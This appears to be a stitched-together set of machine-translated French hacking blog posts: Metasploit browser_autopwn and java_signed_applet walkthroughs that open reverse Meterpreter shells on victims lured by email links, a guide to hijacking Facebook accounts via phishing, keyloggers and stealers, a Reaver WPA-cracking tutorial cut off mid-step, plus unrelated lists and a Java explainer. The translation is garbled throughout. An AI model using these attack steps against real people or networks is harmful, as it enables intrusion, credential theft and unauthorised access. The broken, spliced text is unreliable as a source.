Metasploit Browser Autopwn


Dans nos jours en raison de restrictions de pare-feu et la gestion des correctifs politiques exploitation des systèmes est devenue beaucoup plus difficult.However un de la manière la plus efficace est l'utilisation d'attaques secondaires attacks.Client côté client nécessite l'interaction de l'utilisateur et dans la plupart des cas, peut être utilisé par engagements.An sociale employé ingénierie qui n'auront pas les connaissances nécessaires pour comprendre les risques de l'ouverture des liens non fiables peut aider un attaquant d'exploiter toute systems.Also interne le fait que les navigateurs ne sont pas corrigées, aussi souvent que les systèmes d'exploitation rend le problème plus .
Dans cet article nous allons examiner l'efficacité de Metasploit navigateur autopwn module.The idée de base derrière ce module est qu'il crée un serveur web dans notre machine locale qui contiendra différents types de navigateur exploits.When l'utilisateur ouvre le lien malveillant puis le exécution des exploits démarre contre le navigateur de l'utilisateur et si l'un des exploits est réussie d'une session de Meterpreter s'ouvre.
Pour utiliser cette attaque, nous devons ouvrir le Metasploit Framework et d'utiliser le  browser_autopwnmodule.In l'image suivante vous pouvez voir les options disponibles et les réglages par défaut pour ce module.
Options Module autopwn du navigateur
Nous allons mettre en place le  LHOST  avec notre adresse IP, le  SRVPORT  avec le port 80 (par ailleurs le lien que nous devons envoyer à l'utilisateur doit me dans le format IP: 8080) et le  URIPATH  avec  / pour éviter de mettre en Metasploit jusqu'à URL aléatoire est.

Configuration du Autopwn du navigateur

Après l'exécution de ce module, nous remarquerons que les différents exploits pour une variété de navigateurs vont commencer à charger à notre serveur web.

Chargement du navigateur exploite

Maintenant, nous pouvons partager le lien via notre e-mail à notre employees.If client tout utilisateur ouvre le lien malveillant, le module autopwn va essayer tous ces exploits afin de voir si elle peut percer dans le client.If le navigateur est vulnérable à une des ces séances de Meterpreter des exploits s'ouvre.

séances de Meterpreter ouvert avec le navigateur Autopwn

attaques à base de navigateur ne sont pas stable.This c'est parce que les navigateurs peuvent bloquer ce qui signifie que la session de Meterpreter ou l'accès au shell seront lost.For cette raison que le Metasploit va essayer de migrer d'un autre processus plus dès que possible stable.

Migrer vers un autre processus

Conclusion
La plupart des organisations sont derrière des pare-feu proxy de sorte que le port 80 est allowed.From les autres de nombreux employés de la main utilisent les réseaux sociaux ces jours-ci pour diverses attaquant de reasons.An peuvent exploiter cela et envoyer des liens malveillants à travers les réseaux sociaux aux utilisateurs pour l'utilisation de cette attaque peut être très efficace contre les entreprises car il contient des exploits pour la plupart des navigateurs les plus populaires et il ne nécessite que l'erreur d'une personne afin de module de Autopwn du navigateur successful.Metasploit est la preuve de la dangerosité est d'ouvrir les liens qui sont provenant de sources non fiables.

Top 10 des meilleurs hackers Ever



Les bons pirates informatiques sont similaires aux anciens combattants en ce sens qu'ils passent des heures à parler de comment grand la scène habitude d'être "de retour dans la journée". J'ai d'abord entendu chemin des histoires similaires en 1995, mais aujourd'hui, il est effectivement un peu vrai que la conférence de dernier espoir a maintenant eu lieu, Black Hat est maintenant un événement d'entreprise, les bons e-zines ont disparu depuis longtemps et le piratage est désormais associé à la criminalité russe gangs.
C'est maintenant le bon moment pour revenir en arrière et dresser la liste des 10 meilleurs hackers qui ont façonné les industries de la sécurité et de l'ordinateur et qui ont laissé leur marque.
1.  Shawn Fanning  - Ce qui était autrefois une poignée IRC est devenu synonyme avec le libre échange de fichiers musicaux. Avec Jordan Ritter et Shaun Parker a changé l'industrie de la musique pour toujours et à tracer la voie pour la prochaine décennie des médias en ligne. Réussi à transformer un groupe de metal rock cool dans un tas de pleurnicher bébés et a eu son moment élevé quand il est apparu sur les MTV music awards portant un t-shirt métallisé. ADM était aussi le meilleur et le plus constant groupe jamais ( wikipedia ).
2.  Robert Morris  - Découvert le buffer overflow et exploité à la fois sendmail et fingerd avec le premier ver Internet jamais - maintenant connu comme le ver Morris. Est devenu un co-fondateur de ViaWeb avec Paul Graham. Inconvénient est que  son histoire  était responsable de Dade Murphy et la Gibson SG, mais il nous a aussi acheté Angelina Jolie. ( wikipedia )
3.  VallaH  - jolt.c et le ping-de-mort conservés enfants autour du monde amusé pendant des années et des grandes entreprises sur leurs genoux. La première attaque par déni de service intelligent.
4. Gordon Lyon / Fyodor  - Créé  Nmap , le
premier outil dans tous les hackers arsenal qui a depuis continué à faire des apparitions à la fois la matrice et la Bourne Ultimatum. Nmap pionnier OS et un service d'empreintes digitales. Également derrière insecure.org. ( wikipedia )
5. Kevin Mitnick  - pirate de la vie réelle plus célèbre qui aurait pu utiliser quelques conseils sur la façon triangulation cellulaire fonctionne. Emprisonné par le gouvernement sans inculpation pendant des années et limité avec un ordre de bâillon par la suite. GRATUIT KEVIN est devenu un appel pour la liberté de pirates depuis des années. ( wikipedia )
6. Le mentor  - a écrit le  Manifeste Hacker  qui a été publié dans le magazine Phrack. Enfants inspirés à travers le monde pour pirater d'apprendre (moi y compris). Phrack Magazine mérite une mention que c'était la meilleure et la plus consistante e-zine dans les deux dernières décennies. Ran pour 65 questions jusqu'en 2005.
7. Karl Koch / Août Diehl  - pirate allemand dans les années 80 qui ont conduit lui-même fou de l'abus de cocaïne, obsession sur le nombre 23 et la paranoïa sur la Illuminé. ( wikipedia )
8. Electron / Richard Jones  - Aussie gamin qui dévasta tout le monde avec rien de plus qu'un modem.Arrêté par la police fédérale australienne en 1990. Est devenu un chercheur en sécurité et consultant.
9. Kevin Poulsen / foncé Dante  - Phreaked sa place à une nouvelle Porsche avec un concours de la radio sur une station de Los Angeles. Arrêté et emprisonné et a continué à devenir journaliste et rédacteur en chef de Wired. ( wikipedia )
10. Adrian Lamo  - a montré au monde (littéralement) que vous pouvez prendre de grands sites Web avec juste URL ( comme Worldcom ). Maintenant, également journaliste. ( wikipedia )
Ce qui est étonnant, c'est juste combien de ces gars-là mêmes qui avaient l'habitude de siéger le jour et la nuit IRC découvrir les failles de sécurité et s'introduire dans les serveurs pour le plaisir fini par façonner et d'influencer l'industrie informatique dans son ensemble. Il ya des centaines de milliers de hackers qui vous n'avez jamais entendu parler, principalement parce qu'ils ne se sont fait prendre, qui a continué à créer des entreprises et à atteindre des postes élevés au sein des entreprises.

POURQUOI Java est un langage indépendante de la plateforme?




Platform Independent signifie écrire du code dans un  système d'exploitation (Windows) et l'exécution de ce code sur une autre  plate-forme (Linux). "Write Once et exécuter partout»  c'est ce qu'on appelle plate-forme indépendante. Elle est due au phénomène touche de byte code. code octet est le langage machine de  la machine virtuelle Java (JVM) .



Byte exécution de code:
1) Ecrire le  code source  dans l'éditeur de texte et enregistrez-le  . java  extension.
2) En utilisant  Javac  compilateur le code source compile dans la   classe.  fichier. Une   . classe contient le code source sous forme de code d'octets.
3)  Java interprète  accepte le fichier.
4)  JVM  convertit la   classe.  fichier pour le fichier exécutable   . obj .
5) Ce   fichier. obj  est utilisé pour générer la sortie.
6) Les différents types de JVM sont disponibles pour les différents systèmes d'exploitation: Sun JVM                                JVM de Microsoft et                                 IBM JVM etc L'utilisation de ces JVM de la même   classe.  fichier fonctionne sur différentes plates-formes.



Par conséquent, cela prouve que Java est un langage indépendant de la plateforme.

TOP 10 façons de pirater des comptes Facebook


Facebook est l'un des site de réseautage social le plus utilisé avec plus de 750 millions d'utilisateurs, comme une raison si ce qui est devenu le 1 cible de hackers numéro, j'ai mentionné les meilleurs méthodes qui ont été utilisées par les hackers pour pirater des comptes Facebook, mais beaucoup de choses ont changé, beaucoup de méthodes ont allé obsolètes ou ont été rafistolé par facebook et beaucoup de nouvelles méthodes ont été mises en place, donc dans ce post, je vais écrire le top 10 des méthodes comment les pirates peuvent pirater des comptes Facebook.
10 façons comment les pirates pouvez pirater les comptes Facebook
Donc, voici le top 10 des méthodes qui ont été les plus populaires:
1. Facebook Phishing
Le phishing est toujours vecteur d'attaque le plus populaire utilisé pour les comptes facebook piratage, Il existe plusieurs méthodes pour effectuer attaque de phishing, de simples attaques de phishing un pirate crée une fausse page de connexion qui ressemble exactement à la page facebook réel et demande ensuite à la victime pour vous connecter à la page, une fois les connexions aux victimes à travers la fausse page aux victimes "Adresse Email" et "Mot de passe" sont stockées dans un fichier texte, le pirate télécharge ensuite le fichier texte et ont obtenu de ses mains sur les victimes pouvoirs.
2. Keylogging
Keylogging, selon moi, c'est la meilleure façon de pirater un mot de passe facebook, Keylogging parfois peut être si dangereuse que même une personne ayant une bonne connaissance de l'informatique peut tomber dans le panneau. Un keylogger est en fait un petit programme qui, une fois installé sur l'ordinateur des victimes va enregistrer tout ce qui les types de victimes sur sa / son ordinateur. Les journaux sont ensuite envoyer à l'attaquant par FTP ou directement aux pirates adresse e-mail.
3. Stealers
Près de 80% pour cent des gens utilisent des mots de passe stockés dans leur navigateur pour accéder au facebook, c'est assez pratique, mais peut parfois être extrêmement dangereux, Stealers sont des logiciels est spécialement conçu pour capturer les mots de passe enregistrés stockés dans le navigateur de la victime, Stealers fois FUD peuvent être extrêmement puissant. Si vous voulez comment voleurs fonctionnent et comment vous pouvez mettre en place votre propre?, Veuillez consulter le livre ci-dessus.
4. Détournement de session
Détournement de session peut être souvent très dangereux si vous accédez Facebook sur une connexion http://, Dans un détournement de session attaquer un pirate vole le navigateur cookie de victimes qui est utilisé pour authentifier un utilisateur sur un site Web et utilise pour cela d'accéder au compte des victimes , détournement de session est largement utilisé sur les réseaux locaux.
5. Sidejacking Avec Firesheep
Attaque sidejacking allé commun à la fin 2010, mais il est encore populaire aujourd'hui un jours, Firesheep est largement utilisé pour effectuer sidejacking attaques, Firesheep ne fonctionne que lorsque l'agresseur et la victime est sur le même réseau wifi. Une attaque sidejacking est fondamentalement un autre nom pour la session HTTP détournement, mais il est plus ciblée sur les utilisateurs wifi.
6. Hacking de téléphone portable
Des millions d'utilisateurs de Facebook accèdent Facebook via leurs téléphones mobiles. Dans le cas où le pirate peut accéder aux victimes de téléphonie mobile, alors il peut probablement accéder à sa / son compte Facebook. . Leur ya beaucoup de logiciels d'espionnage mobiles utilisés pour contrôler un téléphone portable
Le téléphone portable le plus populaire des logiciels d'espionnage sont les suivants:
1. Mobile Spy 2. Spy Phone or
7. DNS Spoofing
Si la victime et agresseur sont sur le même réseau, un attaquant peut utiliser une attaque par usurpation DNS et changer la page facebook.com originale à sa propre fausse page et peut donc obtenir l'accès aux victimes compte Facebook.
8. Hacking USB
Usb Password Stealer
Si un attaquant a un accès physique à votre ordinateur, il ne pouvait tout simplement insérer un USB programmé avec une fonction d'extraire automatiquement les mots de passe enregistrés dans le navigateur.
9. Man in the Middle attaques
Si la victime et agresseur sont sur le même réseau local et sur un réseau basé sur un commutateur, un pirate peut se b / w le client et le serveur placer ou il peut aussi agir comme une passerelle par défaut et donc capturer tout le trafic entre les deux, ARP Poisoning qui est l'autre nom de l'homme dans les attaques du milieu est un sujet très vaste et dépasse le cadre de cet article.
10. Botnets
Les botnets sont pas couramment utilisées pour les comptes facebook piratage, en raison de ses coûts élevés de configuration, ils sont utilisés pour mener des attaques les plus avancés, Un botnet est essentiellement une collection d'ordinateurs compromis, le processus d'infection est le même que le keylogger, mais un botnet vous donne , options supplémentaires dans de mener des attaques avec l'ordinateur compromis. Certains des botnets les plus populaires comprennent SpyEye et Zeus.
Note:. Copie ou reproduction de cet article est strictement interdite et donnera lieu à certaines conséquences, si vous êtes reproduire ou copier cet article, assurez-vous que vous donnez à un crédit approprié
Crédits: http://www.cyberhax.org/

Top 5 des sites pour apprendre à pirater comme un pro


Vous pourriez être surpris d'apprendre combien de gens veulent savoir comment pirater. Le stéréotype est celle du jeune homme au collège - une science informatique majeur pour sûr - qui passe ses soirées et week-ends d'écriture des scripts complexes piratage de s'introduire dans n'importe quel système informatique, il peut mettre la main sur.
La vérité est que ce qui était autrefois une communauté dominée par les hommes est en pleine mutation en un qui comprend des gens - hommes et femmes - de tous les horizons de la vie, de nombreux pays et de nombreuses origines. Un récent article de CNET  sur DEFCON rend compte du fait que les allégations de harcèlement sexuel et d'avances non désirées sont en augmentation. Ce n'est pas parce que les pirates sont de plus odieux ou offensive, mais parce que les pirates plus de femmes entrent dans la communauté et d'essayer de trouver une maison là-bas, seulement pour trouver un comportement insultant, et d'autres actions indigne d'un gentleman.
C'est l'évolution naturelle de ces communautés, et dans le temps la balance pour équilibrer les hommes et les femmes sera pirater côte à côte - mais lorsque vous recherchez des endroits où aller en ligne pour apprendre à pirater, il est important de se rappeler que parce que la démographie et le monde lui-même est en train de changer, ce que vous trouverez dans la plupart des sites de pirates évoluent également de manière significative. Plates-formes en usage passent de base de l'ordinateur aux efforts de piratage plus mobiles et tablettes, il ya beaucoup plus l'accent sur les réseaux sociaux et les nombreux hacks qui sont possibles là-bas, et toutes les autres nouvelles technologies et les outils de piratage disponibles. Les sites qui entretiennent avec ces temps qui changent survivent, alors que ceux qui sont coincés dans le vieux de plusieurs décennies mentalité des hackers-gone-en sont voués à l'échec.

Où vous pouvez aller pour apprendre comment pirater comme un pro

Il ya une mise en garde que je dois partager avant de plonger dans ces sites. Hacking n'est pas un seul sujet que n'importe qui peut prendre du jour au lendemain. Dans le titre de cet article, j'ai mentionné le piratage comme un pro. Cela ne peut être accompli après avoir lu un article et de visiter quelques-uns de ces sites - l'expression est utilisée pour signifier que dans le temps et avec beaucoup de pratique, vous pouvez en effet apprendre à pirater comme un pro.
Pour nos nombreux lecteurs qui sont déjà à ce niveau expert-hacker, quelques-uns de ces sites peuvent ne pas être pour vous. Ils peuvent se sentir à simple et basique - pour "script-kiddies" comme certains pourraient le dire. La vérité est que nous avons tous commencer quelque part, et ces sites sont proposés comme point de départ pour ces gens de se lancer en bas de la écrivait vers hackers.
Votre intention pour apprendre à pirater est entièrement vôtre. Je ne juge pas. Toutefois, il convient de noter qu'il existe deux formes de piratage - «White Hat» et «chapeau noir». Blanche hat hackers eux-mêmes "hackers éthiques» appellent, en ce qu'ils trouvent vulnérabilités simplement de rendre les systèmes et les applications plus sûres pour tout le monde. Cependant, il ya toute une  autrecommunauté de hackers - les chapeaux noirs - qui trouver des vulnérabilités seulement pour les exploiter autant que possible. Maintenant que vous savez quel genre de communauté que vous saisissez peut-être, nous allons passer à la liste des meilleurs sites où vous pouvez apprendre à pirater.

# 1 - Tutorial Hacking: Conseils techniques et astuces de piratage

Parfois, un anglais parfait n'est pas tout.  Tutorial Hacking  est un exemple de cas où la compétence d'écriture de l'auteur ne correspond pas nécessairement à la qualité de ses connaissances techniques.C'est effectivement le cas sur au Tutorial Hacking, où l'auteur propose des articles comme "Attack côté client utilisant Adobe PDF évasion EXE ingénierie sociale», «Exploiter MS11_003 Internet Explorer vulnérabilité» et «Utilisation de cadre Hacking XSS de boeuf".

Les articles sont généralement de courte durée, mais offrent en fait, des instructions étape-par-étape très techniques sur la façon de faire la tâche à accomplir et les astuces et les tweets travailler absolument, à moins que l'exploit a été patché. C'est un petit blog, mais c'est une bonne chose pour le volume des astuces techniques que vous y trouverez.

# 2 - EvilZone Forums piratage

Alors que le nom,  EvilZone , n'est pas exactement le plus accueillant - il est facilement l'un des plus grandes communautés du forum que vous trouverez sur le thème de piratage. Avec plus de 13 042 membres et plus de 50.000 messages (et plus), cette communauté a probablement les compétences et les connaissances nécessaires pour répondre à toute question de programmation que vous pourriez avoir.Il suffit de faire attention à venir à travers comme un "Noob" - ces gars-là ne gèrent pas les nouveaux arrivants avec des gants, alors soyez prudent.

Vous seriez certainement mieux loti de travail à travers la programmation et les articles de l'encyclopédie premier, où vous trouverez des zones avec des projets, des tutoriels et beaucoup plus qui vous aideront à devenir instruits et bien versé dans les techniques de piratage et de la terminologie.

# 3 - Hack a Day

Bien que je ne veux certainement pas offrir un clin d'œil à tous les blogs qui peut être considéré comme une concurrence, il faut vraiment donner du crédit lorsque le crédit est dû quand il s'agit d'un créneau particulier comme le piratage - et  Hack a Day  offre certainement une bibliothèque incroyable de informations pour ceux qui cherchent des catégories spécifiques comme les téléphones cellulaires, GPS ou les caméras numériques. Au fil des ans, Hack a Day a transformé le site en un blog assez populaire.

Plus que tout autre site, ce site «piratage» particulier est très bien matériel en fonction, et ils redéfinir le sens du mot piratage en vous aidant à apprendre à pirater des appareils électroniques comme une Gameboy ou un appareil photo numérique et de modifier complètement, ou construction électronique dans le seul but de d'autres appareils commerciaux de piratage. Vous trouverez également une section de forum populaire et occupé ainsi - un point de la place forte.

Bien que personnellement je ne trouve pas les articles eux-mêmes très détaillés (comme EE, j'aime des schémas et des descriptions élaborées), le site fait pour elle avec des démonstrations vidéo partout.

# 4 - Hack In The Box

Hack In The Box a vraiment changer considérablement au fil des ans. Il est rebaptisé HITB, et le site est complètement transformé dans ce qui ressemble une plate-forme basée sur WordPressed. Pourtant, aujourd'hui  Hack In The Box  reste axé sur la sécurité et le piratage éthique. Toutefois, il a évidemment changé de tactique à un certain moment et a changé à une approche plus axée sur le contenu d'un plus grand volume de nouvelles, et moins d'articles approfondis avec hacks détaillées.

Cette transition fait moins d'un endroit où aller pour réellement conseils techniques de piratage, et plus d'un point par jour pour obtenir votre dernier correctif de nouvelles piratage. Le site est mis à jour fréquemment, et bien sûr, vous pouvez également opter pour la version imprimée du magazine HITB de marque si vous voulez.
De toute évidence, HITB s'est très commercialisé, mais il est une excellente ressource pour les nouvelles pour quiconque s'intéresse à la dernière potins toute la communauté des pirates.

# 5 - Hack ce site!

Comme toujours, gardé le meilleur pour la fin - je voudrais vous présenter  ! Hack ce site  Ce site est l'un des plus cool, les sites de formation de programmeurs libres où vous pouvez apprendre comment pirater accepter l'un des défis le long du volet de navigation de gauche de l' page d'accueil.

Les concepteurs de sites proposent différentes «missions», où vous avez besoin de comprendre la vulnérabilité d'un site et puis essayez d'utiliser vos compétences de piratage retrouvée (vous avez soigneusement étudié tous les articles sur le site, non?) Pour pirater la page Web. Les missions incluent de base, réaliste, Application Programming et bien d'autres.

Si vous êtes en mesure de comprendre comment pirater correctement l'une des missions les plus difficiles sur ce site, alors vous avez certainement gagné le titre de hacker professionnel.
Avez-vous déjà essayé l'un des conseils offerts à l'un de ces sites et ne fonctionnent-ils? Avez-vous des bonnes ressources de votre propre pour les lecteurs d'apprendre à pirater comme les pros? Partagez votre perspicacité dans la section commentaires ci-dessous.

Lazykali - Le nom dit tout

Lazykali - Le nom dit tout


Donc, plus tôt nous avons eu un bon aperçu sur la façon d'ajouter des saignements dépôts de pointe pour Kali Linux.
Apprendre comment ajouter repos supplémentaires est au cœur même de Linux.
Je suis tombé sur un très beau script qui n'est pas crypté et je ne crois tout le monde puisse en bénéficier.
Alors, comment ça fonctionne Lazykali?
Assez simple et direct;
1. Il va de soi se mettre à jour et ajouter de nouvelles applications
2. A la possibilité d'ajouter des saignements repos de pointe automatiquement
3. Possibilité de lancer des services Metasploit et automobiles lancent eux à chaque démarrage
4. Auto et configurer plus de 20 applications qui stimuleront tout autour attaques.
5. Installe un hackpack qui a beaucoup de scripts.
Comment ça marche:
1. Il suffit de télécharger lazykali.sh (vous n'avez pas besoin de télécharger le hackpack si vous exécutez Kali il le fera pour vous)
2. Une fois téléchargé, dans le terminal assurez-vous que vous êtes dans le même répertoire
3. Type chmod 0755 lazykali.sh
4. . / Lazykali.sh
5. Profit!:)
PS. vous pouvez lancer lazykali à partir de n'importe où après que, comme il se copie dans le répertoire / usr / bin
Il suffit de taper lazykali après course initiale et amusez-être paresseux :)

Comment pirater n'importe quel ordinateur Windows XP/Vista/7/8 utilisant Metasploit [REMOTE]

Comment pirater n'importe quel ordinateur Windows XP/Vista/7/8 utilisant Metasploit [REMOTE]



Je vais vous montrer comment pirater une machine Windows utilisant exploit de Metasploit.Si vous utilisez MS Windows, vous devez installer Metasploit, si vous utilisez BackTrack ou Kali Linux, il est deja installé [VICTIME devez avoir installé JAVA].
Cet exploit crée dynamiquement un fichier. Jar via le Msf :: Exploit :: Java mixin, puis il signe l'.L'applet signée en résulte est présenté à la victime via une page web avec une balise d'applet.JVM de la victime apparaît une boîte de dialogue demandant si ils ont confiance l'applet signée. Sur les anciennes versions de la boîte de dialogue affiche la valeur de CERTCN dans la ligne "Editeur". Newer affichage JVM "UNKNOWN" si la signature n'est pas fiable (c'est à dire qu'il n'est pas signé par une autorité de certification). L'option SigningCert vous permet de fournir un code de confiance signature cert, les valeurs qui remplaceront CERTCN. Si SigningCert n'est pas donné, un certificat auto-signé généré aléatoirement sera utilisé. De toute façon, une fois que l'utilisateur clique sur "run", l'applet s'exécute avec toutes les permissions de l'utilisateur.
Donc, nous allons commencer.
D'abord, lancez la console Metasploit en tapant msfconsole dans l'aérogare.
msf>  utilisation exploit / multi / browser / java_signed_applet
msf exploit (java_signed_applet)>  show payloads
msf exploit (java_signed_applet)>  set PAYLOAD java / Meterpreter / reverse_tcp
msf exploit (java_signed_applet)>  mettre LHOST [MON ADRESSE IP]
msf exploit (java_signed_applet)>  exploiter
LHOST est votre adresse IP, vous pouvez vérifier en tapant "ifconfig" dans le terminal.

Exploit Options du module

APPLETNAMELe nom de la classe de l'applet principale. (Par défaut: SiteLoader)
CERTCNLe CN = valeur pour le certificat. Ne peut pas contenir ',' ou '/' (par défaut: SiteLoader)
SRVHOSTL'hôte local à écouter. Ce doit être une adresse sur la machine locale ou 0.0.0.0 (par défaut: 0.0.0.0)
SRVPORTLe port local à écouter. (Par défaut: 8080)
SSLNégocier SSL pour les connexions entrantes
SslcertChemin d'un certificat SSL personnalisé (par défaut est généré aléatoirement)
SSLVersionSpécifiez la version de SSL qui doit être utilisé (accepté: SSL2, SSL3, TLS1) (par défaut: SSL3)
SigningCertChemin d'un certificat de signature en PEM ou PKCS12 (. Pfx) Format
SigningKeyChemin vers une clé de signature au format PEM
SigningKeyPassMot de passe pour la clé de signature (obligatoire si SigningCert est un. Pfx)
URIPATHL'URI à utiliser pour cet exploit (le défaut est aléatoire)
ContextInformationFileLe fichier d'informations qui contient des informations de contexte
DisablePayloadHandlerDésactiver le code du gestionnaire de la charge utile sélectionnée
EXE :: PersonnaliséUtilisez exe personnalisée au lieu de générer automatiquement un exe charge
EXE :: FallBackUtilisez le modèle par défaut dans le cas de celui spécifié est manquant
EXE :: InjecterSet de préserver la fonction EXE originale
EXE :: OldMethodPermet d'utiliser la méthode de génération de EXE de substitution.
EXE :: CheminLe répertoire dans lequel rechercher le modèle exécutable
EXE :: TemplateLe nom du fichier de modèle exécutable.
EnableContextEncodingUtilisez contexte transitoire lors de l'encodage des charges utiles
ListenerCommLe canal de communication spécifique à utiliser pour ce service,
VERBOSEActiver les messages d'état détaillés
ESPACE DE TRAVAILSpécifiez l'espace de travail pour ce module
HTML :: base64Activer obscurcissement HTML via un embeded base64 objet HTML (IE pas pris en charge) (accepté: aucun, plaine, single_pad, double_pad, random_space_injection)
HTML :: javascript :: échapperActiver obscurcissement HTML via HTML s'échapper (nombre d'itérations)
HTML :: unicodeActiver obfuscation HTTP via unicode (accepté: aucun, UTF-16LE, UTF-16BE, UTF-16BE-marqueur, UTF-32LE, UTF-32BE)
HTTP :: chunkedActiver arrachement des réponses HTTP via "Transfer-Encoding: chunked"
Compression HTTP ::Activer la compression des réponses HTTP via le codage de contenu (accepté: aucun, gzip, deflate)
HTTP :: header_foldingActiver le pliage des en-têtes HTTP
HTTP :: junk_headersPermettre l'insertion de hasard indésirables en-têtes HTTP
HTTP :: nom_serveurConfigure l'en-tête du serveur de toutes les réponses sortantes
TCP :: max_send_sizeMaximum tcp taille de segment. (0 = désactiver)
TCP :: send_delayLes retards insérés avant chaque envoi. (0 = désactiver)

Comment cracker un réseau Wi-Fi WPA passe avec Reaver

Comment cracker un réseau Wi-Fi WPA passe avec Reaver



Votre réseau Wi-Fi est votre passerelle commodément sans fil à l'Internet, et puisque vous n'êtes pas désireux de partager votre connexion avec n'importe quel vieux voyou qui se trouve être en passant devant votre maison, vous sécuriser votre réseau avec un mot de passe, non? Sachant, que vous pourriez, comment  il est facile de casser un mot de passe WEP , vous avez probablement sécuriser votre réseau en utilisant le protocole de sécurité WPA plus-balles.
Voici les mauvaises nouvelles: Un nouvel outil gratuit, open-source appelée  Reaver  exploite une faille de sécurité dans les routeurs sans fil et peut se fissurer mots de passe actuels plupart des routeurs avec une relative facilité. Voici comment faire pour casser un mot de passe WPA ou WPA2, étape par étape, avec Reaver et la façon de protéger votre réseau contre les attaques Reaver.
Dans la première partie de ce post, je vais marcher à travers les étapes nécessaires pour casser un mot de passe WPA utilisant Reaver. Vous pouvez suivre avec soit la vidéo ou le texte ci-dessous. Après cela, je vais vous expliquer comment fonctionne Reaver, et ce que vous pouvez faire pour protéger votre réseau contre les attaques Reaver.


Tout d'abord, un petit mot:  Comme nous rappelons souvent rappeler aux lecteurs lorsque nous discutons de sujets qui apparaissent potentiellement malveillant: Savoir, c'est pouvoir, mais le pouvoir ne signifie pas que vous devez être un imbécile, ou faire quelque chose d'illégal. Savoir comment crocheter une serrure ne pas vous faire un voleur. Pensez à ce poste d'enseignement ou un exercice intellectuel preuve de concept.Plus vous en savez, mieux vous pouvez vous protéger.

Ce qu'il vous faut


    Vous n'avez pas à être un assistant de mise en réseau pour utiliser Reaver, l'outil en ligne de commande qui fait le gros du travail, et si vous avez un DVD vierge, un ordinateur compatible avec Wi-Fi, et quelques heures sur les mains , vous avez fondamentalement tout ce que vous aurez besoin. Il ya un certain nombre de façons que vous pouvez mettre en place Reaver, mais voici les exigences spécifiques de ce guide:


    • Comment cracker un réseau Wi-Fi WPA passe avec ReaverLe BackTrack 5 DVD Live .  BackTrack est une distribution Linux bootable qui est rempli à ras bord avec des outils de test de réseau, et si elle n'est pas strictement nécessaire pour utiliser Reaver, c'est l'approche la plus simple pour la plupart des utilisateurs. Télécharger le DVD live  de la page de téléchargement de BackTrack  et le graver sur un DVD. Vous pouvez télécharger alternativement une image de machine virtuelle si vous utilisez VMware, mais si vous ne savez pas ce que VMware est, il suffit de coller avec le DVD live. A ce jour, cela signifie que vous devez sélectionner BackTrack 5 R1 de la parution déroulante, sélectionnez Gnome, 32 - ou 64-bit en fonction de votre CPU (si vous ne savez pas que vous avez, 32 est une valeur sûre) , ISO pour l'image, puis télécharger l'ISO.
    • Un ordinateur avec une connexion Wi-Fi et un lecteur DVD.  BackTrack travaillera avec la carte sans fil sur la plupart des ordinateurs portables, si les chances sont de votre ordinateur portable fonctionne très bien. Cependant, BackTrack n'a pas de liste de compatibilité complète, donc aucune garantie. Vous aurez également besoin d'un lecteur DVD, puisque c'est comme ça que vous démarrez dans BackTrack. J'ai utilisé un six-année-vieux MacBook Pro.
    • Un réseau Wi-Fi WPA-sécurisé à proximité.  Techniquement, il aura besoin d'être un réseau utilisant la sécurité WPA avec le WPS fonction est activée. Je vais vous expliquer plus en détail dans la section «Comment Reaver Works" comment WPS crée le trou de sécurité qui rend WPA fissuration possible.
    • Un peu de patience.  C'est un processus en 4 étapes, et alors qu'il n'est pas très difficile à casser un mot de passe WPA avec Reaver, c'est une attaque par force brute, ce qui signifie que votre ordinateur sera de tester un certain nombre de combinaisons différentes de fissures sur votre routeur avant de trouver la bonne. Quand je l'ai testé, Reaver a pris environ 2,5 heures pour réussir craquer mon mot de passe. La  page d'accueil Reaver  suggère qu'il peut durer de 4 à 10 heures. Votre kilométrage peut varier.

    Let 's Get Crackin'

    À ce stade, vous devriez avoir BackTrack gravé sur un DVD, et vous devriez avoir votre portable à portée de main.

    Étape 1: démarrage en BackTrack


    SEXPAND
    Pour démarrer en BackTrack, il suffit de mettre le DVD dans votre lecteur et redémarrez votre machine à partir du disque. (Google autour si vous ne savez rien à propos de CD / DVD en direct et besoin d'aide pour cette partie.) Pendant le processus de démarrage, BackTrack vous invite à choisir le mode de démarrage. Sélectionnez «BackTrack texte - Default Boot mode texte" et appuyez sur Entrée.
    Finalement BackTrack va démarrer à une invite de ligne de commande. Lorsque vous avez atteint l'invite, tapez startx et appuyez sur Entrée. BackTrack va démarrer dans son interface graphique.

    Étape 2: Installation Reaver

    Reaver a été ajouté à la version fine pointe de BackTrack, mais ce n'est pas encore incorporé avec le DVD live, afin d'écrire ces lignes, vous devez installer Reaver avant de continuer. (Finalement, Reaver sera tout simplement incorporé avec BackTrack par défaut.) Pour installer Reaver, vous devez d'abord vous connecter à un réseau Wi-Fi que vous avez le mot de passe.
    1. Cliquez sur Applications> Internet> Wicd Network Manager
    2. Sélectionnez votre réseau, puis cliquez sur Se connecter, entrez votre mot de passe si nécessaire, cliquez sur OK, puis cliquez sur Connecter un second temps.
    Maintenant que vous êtes en ligne, nous allons installer Reaver. Cliquez sur le bouton Terminal dans la barre de menu (ou cliquez sur Applications> Accessoires> Terminal). À l'invite, tapez:
    apt-get update
    Et puis, après la mise à jour complète:
    apt-get install Reaver

    Si tout va bien, Reaver devrait maintenant être installé. Il peut sembler un peu boiteux que vous avez besoin pour vous connecter à un réseau pour le faire, mais il restera installé jusqu'à ce que vous redémarrez votre ordinateur. À ce stade, aller de l'avant et se déconnecter du réseau en ouvrant de nouveau Network Manager Wicd et en cliquant sur Déconnecter. (Vous ne pouvez pas strictement besoin pour ce faire. J'ai fait juste parce que j'avais l'impression d'une certaine manière triche si j'étais déjà connecté à un réseau.)

    Étape 3: Recueillir des informations de votre appareil, préparer votre Crackin '

    Pour utiliser Reaver, vous devez obtenir le nom de l'interface de votre carte sans fil, le BSSID du routeur que vous essayez de casser (le BSSID est une série unique de lettres et de chiffres qui identifie un routeur), et vous devez vous assurer votre carte sans fil est en mode moniteur. Donc, nous allons faire tout cela.
    Trouvez votre carte sans fil:  Terminal A l'intérieur, tapez:
    iwconfig

    Appuyez sur Entrée. Vous devriez voir un appareil sans fil dans la liste suivante. Très probablement, il sera nommé wlan0 , mais si vous avez plus d'une carte sans fil, ou une configuration réseau plus rare, il peut être nommé quelque chose de différent.
    Mettez votre carte réseau sans fil en mode moniteur:  En supposant que le nom de l'interface de votre carte sans fil est wlan0 , exécutez la commande suivante pour mettre votre carte réseau sans fil en mode moniteur:
    airmon-ng start wlan0
